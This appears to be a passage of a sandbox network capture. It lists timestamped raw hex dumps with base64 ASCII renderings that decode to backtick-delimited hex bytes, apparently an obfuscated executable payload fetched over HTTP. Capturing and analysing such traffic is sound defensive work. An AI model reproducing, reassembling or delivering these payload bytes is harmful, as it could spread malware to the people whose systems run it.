                                                      2021-12-02 17:26:37 UTC912INData Raw: 73 59 44 41 34 4c 47 41 77 51 69 78 67 51 30 45 73 59 44 42 47 4c 47 42 43 4e 69 78 67 4e 54 41 73 59 44 42 46 4c 47 41 34 4d 53 78 67 52 54 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 53 78 67 52 54 49 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 77 4c 47 42 44 4d 53 78 67 52 54 45 73 59 44 41 34 4c 47 41 77 51 69 78 67 51 30 45 73 59 44 42 47 4c 47 42 43 4e 69 78 67 4e 54 41 73 59 44 42 47 4c 47 42 45 4d 53 78 67 52 55 45 73 59 45 4d 78 4c 47 42 46 4d 53 78 67 4d 44 63 73 59 44 42 43 4c 47 42 44 51 53 78 67 4f 45 45 73 59 44 55 77 4c 47 41 77 51 69 78 67 52 6a 59 73 59 45 4d 79 4c 47 41 77 4d 53 78 67 4e 7a 51 73 59 44 41 32 4c 47 41 34 4d 53 78 67 51 7a 6b 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44
                                                      Data Ascii: sYDA4LGAwQixgQ0EsYDBGLGBCNixgNTAsYDBFLGA4MSxgRTEsYEZGLGBGRixgMDAsYDAwLGA4MSxgRTIsYEZGLGBGRixgRkYsYDAwLGBDMSxgRTEsYDA4LGAwQixgQ0EsYDBGLGBCNixgNTAsYDBGLGBEMSxgRUEsYEMxLGBFMSxgMDcsYDBCLGBDQSxgOEEsYDUwLGAwQixgRjYsYEMyLGAwMSxgNzQsYDA2LGA4MSxgQzksYDAwLGAwMCxgMD
                                                      2021-12-02 17:26:37 UTC928INData Raw: 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 4a 43 4c 47 41 78 4f 53 78 67 4d 54 6b 73 59 44 4d 79 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 44 4a 44 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 35 4e 53 78 67 4e 7a 4d 73 59 44 63 7a 4c 47 42 46 4e 69 78 67 51 7a 63 73 59 44 67 31 4c 47 41 7a 4d 43 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 51 54 41 73 59 44 59 77 4c 47 41 32 4d 43 78 67 51 7a 41 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 4d 7a 51 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 6b 34 4c 47 41 34 4d 53 78 67 4f 44 45 73 59 44 45 35 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 44 4d 34 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 45 4d 53 78 67 4e 45 59 73 59 44 52 47 4c 47 41 35 52 53 78 67 51 7a
                                                      Data Ascii: sYEZELGBGRixgRkYsYDJCLGAxOSxgMTksYDMyLGBDNyxgODUsYDJDLGBGRCxgRkYsYEZGLGA5NSxgNzMsYDczLGBFNixgQzcsYDg1LGAzMCxgRkQsYEZGLGBGRixgQTAsYDYwLGA2MCxgQzAsYEM3LGA4NSxgMzQsYEZELGBGRixgRkYsYDk4LGA4MSxgODEsYDE5LGBDNyxgODUsYDM4LGBGRCxgRkYsYEZGLGBEMSxgNEYsYDRGLGA5RSxgQz
                                                      2021-12-02 17:26:37 UTC944INData Raw: 73 59 45 5a 47 4c 47 42 44 52 53 78 67 4d 7a 59 73 59 44 5a 47 4c 47 41 30 51 53 78 67 51 7a 63 73 59 44 67 31 4c 47 42 47 4f 43 78 67 52 6a 6b 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 44 51 73 59 44 41 35 4c 47 41 35 52 69 78 67 52 55 45 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 52 6b 4d 73 59 45 59 35 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 51 32 4c 47 41 33 51 79 78 67 51 6a 41 73 59 44 49 35 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 44 41 77 4c 47 42 47 51 53 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 42 52 69 78 67 51 6a 49 73 59 45 45 30 4c 47 41 7a 4d 53 78 67 51 7a 63 73 59 44 67 31 4c 47 41 77 4e 43 78 67 52 6b 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4d 7a 45 73 59 44 49 7a 4c 47 41 7a 52 69 78 67 4d 6b 45 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 4d 44
                                                      Data Ascii: sYEZGLGBDRSxgMzYsYDZGLGA0QSxgQzcsYDg1LGBGOCxgRjksYEZGLGBGRixgRDQsYDA5LGA5RixgRUEsYEM3LGA4NSxgRkMsYEY5LGBGRixgRkYsYEQ2LGA3QyxgQjAsYDI5LGBDNyxgODUsYDAwLGBGQSxgRkYsYEZGLGBBRixgQjIsYEE0LGAzMSxgQzcsYDg1LGAwNCxgRkEsYEZGLGBGRixgMzEsYDIzLGAzRixgMkEsYEM3LGA4NSxgMD
                                                      2021-12-02 17:26:37 UTC960INData Raw: 73 59 44 67 78 4c 47 42 46 4d 79 78 67 52 6b 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 42 47 4c 47 42 43 4e 69 78 67 4e 55 4d 73 59 44 6b 34 4c 47 41 77 4e 53 78 67 4d 7a 4d 73 59 45 5a 43 4c 47 41 7a 4d 79 78 67 4d 7a 6b 73 59 44 68 43 4c 47 42 45 52 69 78 67 51 7a 45 73 59 45 4e 43 4c 47 41 77 4f 43 78 67 4f 44 45 73 59 45 55 7a 4c 47 41 77 4d 43 78 67 52 6b 59 73 59 44 41 77 4c 47 42 47 52 69 78 67 51 7a 45 73 59 45 4d 33 4c 47 41 77 4f 43 78 67 4f 44 45 73 59 45 55 33 4c 47 42 47 52 69 78 67 4d 44 41 73 59 45 5a 47 4c 47 41 77 4d 43 78 67 4d 45 49 73 59 45 52 47 4c 47 41 34 51 69 78 67 4e 30 51 73 59 44 42 44 4c 47 41 34 4f 53 78 67 4d 55 59 73 59 44 68 43 4c 47 41 31 52 43 78 67 52 6a 51 73 59 45 4d 78 4c 47 42 47 51 69 78 67 4d 54
                                                      Data Ascii: sYDgxLGBFMyxgRkYsYDAwLGAwMCxgMDAsYDBGLGBCNixgNUMsYDk4LGAwNSxgMzMsYEZCLGAzMyxgMzksYDhCLGBERixgQzEsYENCLGAwOCxgODEsYEUzLGAwMCxgRkYsYDAwLGBGRixgQzEsYEM3LGAwOCxgODEsYEU3LGBGRixgMDAsYEZGLGAwMCxgMEIsYERGLGA4QixgN0QsYDBDLGA4OSxgMUYsYDhCLGA1RCxgRjQsYEMxLGBGQixgMT
                                                      2021-12-02 17:26:37 UTC976INData Raw: 73 59 44 67 35 4c 47 41 35 4e 53 78 67 4f 54 41 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 55 34 4c 47 41 78 51 69 78 67 4e 30 55 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 68 47 4c 47 41 79 4d 43 78 67 4e 44 6b 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 45 73 59 44 68 45 4c 47 41 35 4e 53 78 67 4e 7a 67 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 55 79 4c 47 41 31 4e 69 78 67 52 54 67 73 59 45 49 33 4c 47 41 32 52 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 51 34 4c 47 41 34 4d 79 78 67 51 6b 55 73 59 45 59 30 4c 47 41 77 4f 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 67 33 4c 47 41 30 4d 43 78 67 52 44 67 73 59 44 46 47 4c 47 41 77 4d 43 78 67 4f 44
                                                      Data Ascii: sYDg5LGA5NSxgOTAsYEZFLGBGRixgRkYsYEU4LGAxQixgN0UsYDAxLGAwMCxgOEQsYDhGLGAyMCxgNDksYDAwLGAwMCxgNTEsYDhELGA5NSxgNzgsYEZFLGBGRixgRkYsYDUyLGA1NixgRTgsYEI3LGA2RSxgMDAsYDAwLGA4MyxgQzQsYDQ4LGA4MyxgQkUsYEY0LGAwOSxgMDAsYDAwLGAwMCxgOEQsYDg3LGA0MCxgRDgsYDFGLGAwMCxgOD
                                                      2021-12-02 17:26:37 UTC992INData Raw: 73 59 45 4d 30 4c 47 41 7a 4f 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 33 4e 53 78 67 4d 55 45 73 59 44 67 31 4c 47 42 45 51 69 78 67 4e 7a 51 73 59 44 42 42 4c 47 41 31 4d 79 78 67 4e 54 59 73 59 45 55 34 4c 47 41 33 4e 53 78 67 4e 7a 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4f 43 78 67 4e 55 59 73 59 44 56 46 4c 47 42 43 4f 43 78 67 4d 44 51 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 56 43 4c 47 41 34 51 69 78 67 52 54 55 73 59 44 56 45 4c 47 42 44 4d 79 78 67 4f 45 49 73 59 44 55 31 4c 47 41 77 51 79 78 67 4f 45 49 73 59 44 51 31 4c 47 41 78 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 55 49 73 59 44 68 45 4c 47 41 34 52 43 78 67 4f 54 67 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b
                                                      Data Ascii: sYEM0LGAzOCxgODUsYEMwLGA3NSxgMUEsYDg1LGBEQixgNzQsYDBBLGA1MyxgNTYsYEU4LGA3NSxgNzEsYDAxLGAwMCxgODMsYEM0LGAwOCxgNUYsYDVFLGBCOCxgMDQsYDAwLGAwMCxgMDAsYDVCLGA4QixgRTUsYDVELGBDMyxgOEIsYDU1LGAwQyxgOEIsYDQ1LGAxMCxgNkEsYDAwLGA2QSxgMUIsYDhELGA4RCxgOTgsYEZFLGBGRixgRk
                                                      2021-12-02 17:26:37 UTC1008INData Raw: 73 59 44 45 79 4c 47 42 47 4e 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 4f 43 78 67 51 6a 67 73 59 44 67 79 4c 47 41 30 4f 43 78 67 51 7a 67 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 31 4d 79 78 67 4e 54 63 73 59 44 67 35 4c 47 41 34 4e 69 78 67 4d 44 41 73 59 44 42 45 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 45 55 34 4c 47 42 47 51 79 78 67 52 6a 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6a 67 73 59 45 59 35 4c 47 41 31 4e 43 78 67 52 54 6b 73 59 44 51 30 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 67 35 4c 47 41 34 4e 69 78 67 4d 44 67 73 59 44 42 45 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 34 4e 69 78 67 51 54 41 73 59 44 42 43 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54
                                                      Data Ascii: sYDEyLGBGNixgMDAsYDAwLGA2OCxgQjgsYDgyLGA0OCxgQzgsYDZBLGAwMCxgNkEsYDAwLGA1MyxgNTcsYDg5LGA4NixgMDAsYDBELGAwMCxgMDAsYEU4LGBGQyxgRjUsYDAwLGAwMCxgNjgsYEY5LGA1NCxgRTksYDQ0LGA2QSxgMDAsYDg5LGA4NixgMDgsYDBELGAwMCxgMDAsYDhCLGA4NixgQTAsYDBCLGAwMCxgMDAsYDZBLGAwMCxgNT
                                                      2021-12-02 17:26:37 UTC1024INData Raw: 73 59 45 59 35 4c 47 41 34 51 69 78 67 4e 7a 51 73 59 44 41 7a 4c 47 41 34 4f 53 78 67 4e 7a 41 73 59 44 41 34 4c 47 41 34 4d 43 78 67 52 6a 6b 73 59 44 63 31 4c 47 41 33 4e 43 78 67 4d 44 4d 73 59 44 67 35 4c 47 41 33 4d 43 78 67 4d 45 4d 73 59 44 4d 35 4c 47 41 7a 4d 43 78 67 4e 7a 55 73 59 44 42 47 4c 47 41 7a 4f 53 78 67 4e 7a 41 73 59 44 41 30 4c 47 41 33 4e 53 78 67 4d 45 45 73 59 44 4d 35 4c 47 41 33 4d 43 78 67 4d 44 67 73 59 44 63 31 4c 47 41 77 4e 53 78 67 4d 7a 6b 73 59 44 63 77 4c 47 41 77 51 79 78 67 4e 7a 51 73 59 45 4d 31 4c 47 41 34 51 53 78 67 4e 45 59 73 59 44 41 79 4c 47 41 34 4d 43 78 67 52 6a 6b 73 59 44 45 77 4c 47 41 33 4e 43 78 67 4d 44 49 73 59 44 67 35 4c 47 41 7a 4d 43 78 67 4f 44 41 73 59 45 59 35 4c 47 41 77 4f 43 78 67 4e 7a
                                                      Data Ascii: sYEY5LGA4QixgNzQsYDAzLGA4OSxgNzAsYDA4LGA4MCxgRjksYDc1LGA3NCxgMDMsYDg5LGA3MCxgMEMsYDM5LGAzMCxgNzUsYDBGLGAzOSxgNzAsYDA0LGA3NSxgMEEsYDM5LGA3MCxgMDgsYDc1LGAwNSxgMzksYDcwLGAwQyxgNzQsYEM1LGA4QSxgNEYsYDAyLGA4MCxgRjksYDEwLGA3NCxgMDIsYDg5LGAzMCxgODAsYEY5LGAwOCxgNz
                                                      2021-12-02 17:26:37 UTC1040INData Raw: 73 59 44 42 47 4c 47 41 34 4e 43 78 67 51 54 59 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 42 4c 47 41 31 4e 79 78 67 4d 44 59 73 59 44 67 77 4c 47 42 47 51 53 78 67 4d 44 45 73 59 44 63 30 4c 47 41 77 4e 53 78 67 4f 44 6b 73 59 44 41 34 4c 47 41 34 4f 53 78 67 4e 44 67 73 59 44 41 30 4c 47 41 34 4d 43 78 67 52 6b 45 73 59 44 41 31 4c 47 41 33 4e 43 78 67 4d 44 6b 73 59 44 67 35 4c 47 41 30 4f 43 78 67 4d 45 4d 73 59 44 67 35 4c 47 41 30 4f 43 78 67 4d 54 41 73 59 44 67 35 4c 47 41 30 4f 43 78 67 4d 54 51 73 59 44 4d 35 4c 47 41 77 4f 43 78 67 4e 7a 55 73 59 44 46 45 4c 47 41 7a 4f 53 78 67 4e 44 67 73 59 44 41 30 4c 47 41 33 4e 53 78 67 4d 54 67 73 59 44 4d 35 4c 47 41 30 4f 43 78 67 4d 44 67 73 59 44 63 31 4c 47 41 78 4d 79 78 67 4d 7a
                                                      Data Ascii: sYDBGLGA4NCxgQTYsYEZFLGBGRixgRkYsYDhBLGA1NyxgMDYsYDgwLGBGQSxgMDEsYDc0LGAwNSxgODksYDA4LGA4OSxgNDgsYDA0LGA4MCxgRkEsYDA1LGA3NCxgMDksYDg5LGA0OCxgMEMsYDg5LGA0OCxgMTAsYDg5LGA0OCxgMTQsYDM5LGAwOCxgNzUsYDFELGAzOSxgNDgsYDA0LGA3NSxgMTgsYDM5LGA0OCxgMDgsYDc1LGAxMyxgMz
                                                      2021-12-02 17:26:37 UTC1056INData Raw: 73 59 44 5a 43 4c 47 41 77 4d 43 78 67 4e 6b 55 73 59 44 41 77 4c 47 42 44 4e 79 78 67 4e 44 55 73 59 45 55 34 4c 47 41 32 52 69 78 67 4d 44 41 73 59 44 63 33 4c 47 41 77 4d 43 78 67 51 7a 63 73 59 44 51 31 4c 47 42 46 51 79 78 67 4e 6b 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 45 55 34 4c 47 41 34 52 69 78 67 4e 44 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 51 79 78 67 4e 6b 45 73 59 44 45 30 4c 47 41 34 52 43 78 67 4e 45 51 73 59 45 4d 77 4c 47 41 31 4d 53 78 67 4f 44 45 73 59 45 4d 32 4c 47 42 45 51 79 78 67 4d 6a 41 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4e 54 59 73 59 45 55 34 4c 47 41 33 51 53 78 67 4e 44 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 34 52 43 78 67 4e 54
                                                      Data Ascii: sYDZCLGAwMCxgNkUsYDAwLGBDNyxgNDUsYEU4LGA2RixgMDAsYDc3LGAwMCxgQzcsYDQ1LGBFQyxgNkUsYDAwLGAwMCxgMDAsYEU4LGA4RixgNDEsYDAxLGAwMCxgODMsYEM0LGAwQyxgNkEsYDE0LGA4RCxgNEQsYEMwLGA1MSxgODEsYEM2LGBEQyxgMjAsYDAxLGAwMCxgNTYsYEU4LGA3QSxgNDEsYDAxLGAwMCxgNkEsYDAwLGA4RCxgNT
                                                      2021-12-02 17:26:37 UTC1072INData Raw: 73 59 44 55 78 4c 47 41 34 4f 53 78 67 4f 55 51 73 59 45 4d 77 4c 47 42 47 51 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 4d 55 45 73 59 44 4d 32 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 68 43 4c 47 41 35 4e 53 78 67 4f 54 67 73 59 45 59 35 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 45 4c 47 41 30 4e 53 78 67 51 54 67 73 59 44 55 77 4c 47 41 34 52 43 78 67 4e 45 51 73 59 45 51 30 4c 47 41 31 4d 53 78 67 4f 44 6b 73 59 44 55 31 4c 47 42 42 4f 43 78 67 4e 6a 67 73 59 44 4d 34 4c 47 41 77 4e 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4e 54 55 73 59 45 49 30 4c 47 41 31 4d 69 78 67 4e 54 59 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 51 7a 51 73 59 45 5a 44 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 33 4c 47 41 77 4d 43 78 67 4d 44
                                                      Data Ascii: sYDUxLGA4OSxgOUQsYEMwLGBGQyxgRkYsYEZGLGBFOCxgMUEsYDM2LGAwMSxgMDAsYDhCLGA5NSxgOTgsYEY5LGBGRixgRkYsYDhELGA0NSxgQTgsYDUwLGA4RCxgNEQsYEQ0LGA1MSxgODksYDU1LGBBOCxgNjgsYDM4LGAwNCxgMDAsYDAwLGA4RCxgNTUsYEI0LGA1MixgNTYsYEM3LGA4NSxgQzQsYEZDLGBGRixgRkYsYDA3LGAwMCxgMD
                                                      2021-12-02 17:26:37 UTC1088INData Raw: 73 59 44 41 32 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4e 69 78 67 52 54 67 73 59 44 4a 44 4c 47 41 31 4e 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 30 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 42 47 4c 47 41 34 4e 53 78 67 52 6a 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 34 4e 69 78 67 51 55 4d 73 59 44 42 44 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 47 4f 43 78 67 4d 44 45 73 59 44 63 31 4c 47 41 78 4d 53 78 67 4e 54 59 73 59 45 55 34 4c 47 41 30 4d 43 78 67 4e 44 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 59 73 59 45 55 34 4c 47 42 45 51 53 78 67 4d 6a 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 52 54 6b 73 59 44 67 79 4c 47 41 77 4d 43 78 67 4d 44
                                                      Data Ascii: sYDA2LGAwMSxgMDAsYDAwLGA1NixgRTgsYDJDLGA1NSxgMDAsYDAwLGA4MyxgQzQsYDA0LGA4NSxgQzAsYDBGLGA4NSxgRjUsYDAwLGAwMCxgMDAsYDhCLGA4NixgQUMsYDBDLGAwMCxgMDAsYDgzLGBGOCxgMDEsYDc1LGAxMSxgNTYsYEU4LGA0MCxgNDYsYDAwLGAwMCxgNTYsYEU4LGBEQSxgMjUsYDAwLGAwMCxgRTksYDgyLGAwMCxgMD
                                                      2021-12-02 17:26:37 UTC1091INData Raw: 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4f 44 55 73 59 45 55 30 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 31 4d 43 78 67 4e 6b 45 73 59 44 41 34 4c 47 41 32 51 53 78 67 4e 6b 55 73 59 44 5a 42 4c 47 41 32 51 79 78 67 4e 54 59 73 59 45 55 34 4c 47 42 42 52 53 78 67 51 6a 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4f 43 78 67 4e 54 41 73 59 45 55 34 4c 47 42 42 4e 53 78 67 4d 7a 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 78 4d 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 77 52 69 78 67 4f 44 55 73 59 44 68 44 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4f 45 51 73 59 45 55 30 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c
                                                      Data Ascii: AwMCxgMDAsYDAwLGA4RCxgODUsYEU0LGBGRCxgRkYsYEZGLGA1MCxgNkEsYDA4LGA2QSxgNkUsYDZBLGA2QyxgNTYsYEU4LGBBRSxgQjYsYDAwLGAwMCxgODMsYEM0LGAwOCxgNTAsYEU4LGBBNSxgMzEsYDAxLGAwMCxgODMsYEM0LGAxMCxgODUsYEMwLGAwRixgODUsYDhDLGAwMCxgMDAsYDAwLGA4RCxgOEQsYEU0LGBGRCxgRkYsYEZGL
                                                      2021-12-02 17:26:37 UTC1107INData Raw: 42 47 52 69 78 67 52 6b 59 73 59 45 4d 78 4c 47 42 44 51 69 78 67 4d 44 49 73 59 44 68 45 4c 47 41 35 4e 43 78 67 4d 7a 49 73 59 45 51 32 4c 47 42 44 4d 53 78 67 4e 6a 49 73 59 45 4e 42 4c 47 41 34 51 69 78 67 52 6a 41 73 59 44 4d 7a 4c 47 42 44 4d 79 78 67 4f 44 6b 73 59 44 52 45 4c 47 42 47 4e 43 78 67 4f 45 49 73 59 44 52 45 4c 47 42 47 4f 43 78 67 4d 7a 4d 73 59 45 4d 78 4c 47 41 77 4d 79 78 67 4f 44 51 73 59 45 4a 45 4c 47 42 43 51 79 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 6b 73 59 44 55 31 4c 47 42 47 4f 43 78 67 51 7a 45 73 59 45 4d 79 4c 47 41 77 4e 53 78 67 4d 44 4d 73 59 44 55 31 4c 47 42 47 4e 43 78 67 4f 44 6b 73 59 44 63 31 4c 47 42 47 4e 43 78 67 51 7a 45 73 59 45 4d 35 4c 47 41 77 4d 69 78 67 4f 45 51 73 59 44 67 30 4c
                                                      Data Ascii: BGRixgRkYsYEMxLGBDQixgMDIsYDhELGA5NCxgMzIsYEQ2LGBDMSxgNjIsYENBLGA4QixgRjAsYDMzLGBDMyxgODksYDRELGBGNCxgOEIsYDRELGBGOCxgMzMsYEMxLGAwMyxgODQsYEJELGBCQyxgRkUsYEZGLGBGRixgODksYDU1LGBGOCxgQzEsYEMyLGAwNSxgMDMsYDU1LGBGNCxgODksYDc1LGBGNCxgQzEsYEM5LGAwMixgOEQsYDg0L
                                                      2021-12-02 17:26:37 UTC1123INData Raw: 41 78 4e 43 78 67 4e 54 59 73 59 44 55 77 4c 47 41 34 52 43 78 67 4e 45 51 73 59 45 59 77 4c 47 41 31 4d 53 78 67 52 54 67 73 59 45 51 34 4c 47 41 78 52 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 54 55 73 59 44 45 77 4c 47 41 31 4e 69 78 67 4e 54 49 73 59 44 68 45 4c 47 41 30 4e 53 78 67 52 6a 67 73 59 44 55 77 4c 47 42 46 4f 43 78 67 51 30 45 73 59 44 46 45 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 68 43 4c 47 41 30 4e 53 78 67 4d 44 67 73 59 44 68 45 4c 47 41 30 52 43 78 67 52 6a 67 73 59 44 55 78 4c 47 41 34 52 43 78 67 4e 54 55 73 59 45 59 77 4c 47 41 31 4d 69 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 31 4d 43 78 67 52 54 67 73 59 44 6b 33 4c 47 42 46 52 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 7a 4d 79 78 67 51 7a 6b 73 59 44 67 7a 4c
                                                      Data Ascii: AxNCxgNTYsYDUwLGA4RCxgNEQsYEYwLGA1MSxgRTgsYEQ4LGAxRCxgMDEsYDAwLGA4QixgNTUsYDEwLGA1NixgNTIsYDhELGA0NSxgRjgsYDUwLGBFOCxgQ0EsYDFELGAwMSxgMDAsYDhCLGA0NSxgMDgsYDhELGA0RCxgRjgsYDUxLGA4RCxgNTUsYEYwLGA1MixgNkEsYDAwLGA1MCxgRTgsYDk3LGBFRCxgMDAsYDAwLGAzMyxgQzksYDgzL
                                                      2021-12-02 17:26:37 UTC1139INData Raw: 41 31 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 4e 43 78 67 52 54 67 73 59 45 4a 43 4c 47 41 35 4d 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 55 7a 4c 47 41 31 4e 79 78 67 52 54 67 73 59 44 5a 47 4c 47 41 35 4d 79 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 51 53 78 67 4e 45 45 73 59 44 55 32 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 5a 44 4c 47 42 46 4f 43 78 67 51 54 51 73 59 44 6b 79 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4e 44 51 73 59 44 55 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54 4d 73 59 44 55 33 4c 47 42 46 4f 43 78 67 4e 54 55 73 59 44 6b 7a 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 5a 42 4c
                                                      Data Ascii: A1NixgODksYDQ1LGBGNCxgRTgsYEJCLGA5MixgMDAsYDAwLGA1MCxgNkEsYDAwLGA2QSxgMDAsYDUzLGA1NyxgRTgsYDZGLGA5MyxgMDAsYDAwLGA2QSxgNEEsYDU2LGA4OSxgNDUsYEZDLGBFOCxgQTQsYDkyLGAwMCxgMDAsYDgzLGBDNCxgNDQsYDUwLGA2QSxgMDAsYDZBLGAwMCxgNTMsYDU3LGBFOCxgNTUsYDkzLGAwMCxgMDAsYDZBL
                                                      Data Ascii: BBRCxgRUYsYDlGLGBBRSxgNDksYEJDLGBGQSxgMDEsYDYwLGA3OCxgRTMsYDU4LGAzOSxgM0EsYDFDLGBFOSxgNUMsYEJFLGAxQSxgRjMsYEQ1LGAwNixgMjIsYEIyLGBDMSxgN0IsYDdDLGA4MSxgQjksYEFCLGA3QSxgQUEsYEU4LGAyOSxgODIsYEYxLGBGRCxgNzQsYDUxLGAwOSxgQkIsYDVDLGAxNSxgQjYsYDVELGA3RSxgRjcsYERBL
                                                      2021-12-02 17:26:37 UTC1655INData Raw: 42 47 4f 53 78 67 4e 6a 41 73 59 45 56 44 4c 47 41 79 4e 79 78 67 4d 55 49 73 59 44 59 7a 4c 47 41 33 4d 43 78 67 51 30 51 73 59 45 55 77 4c 47 41 7a 4e 79 78 67 4e 6b 51 73 59 45 51 34 4c 47 41 35 52 53 78 67 52 45 49 73 59 44 41 30 4c 47 42 43 4d 43 78 67 4d 7a 51 73 59 44 4a 45 4c 47 41 30 4d 53 78 67 52 55 51 73 59 45 5a 46 4c 47 41 7a 4e 79 78 67 4d 7a 67 73 59 44 45 77 4c 47 41 30 51 53 78 67 4e 6b 49 73 59 44 46 46 4c 47 41 78 51 69 78 67 4d 6a 4d 73 59 44 55 32 4c 47 42 43 51 79 78 67 51 55 51 73 59 44 42 43 4c 47 41 78 4e 53 78 67 52 6b 59 73 59 45 45 32 4c 47 41 7a 4e 79 78 67 4d 55 55 73 59 45 49 31 4c 47 41 77 52 53 78 67 52 54 55 73 59 44 45 30 4c 47 41 7a 4f 43 78 67 4e 30 59 73 59 44 6b 78 4c 47 41 77 4e 69 78 67 4d 6a 67 73 59 44 6c 46 4c
                                                      Data Ascii: BGOSxgNjAsYEVDLGAyNyxgMUIsYDYzLGA3MCxgQ0QsYEUwLGAzNyxgNkQsYEQ4LGA5RSxgREIsYDA0LGBCMCxgMzQsYDJELGA0MSxgRUQsYEZFLGAzNyxgMzgsYDEwLGA0QSxgNkIsYDFFLGAxQixgMjMsYDU2LGBCQyxgQUQsYDBCLGAxNSxgRkYsYEE2LGAzNyxgMUUsYEI1LGAwRSxgRTUsYDE0LGAzOCxgN0YsYDkxLGAwNixgMjgsYDlFL
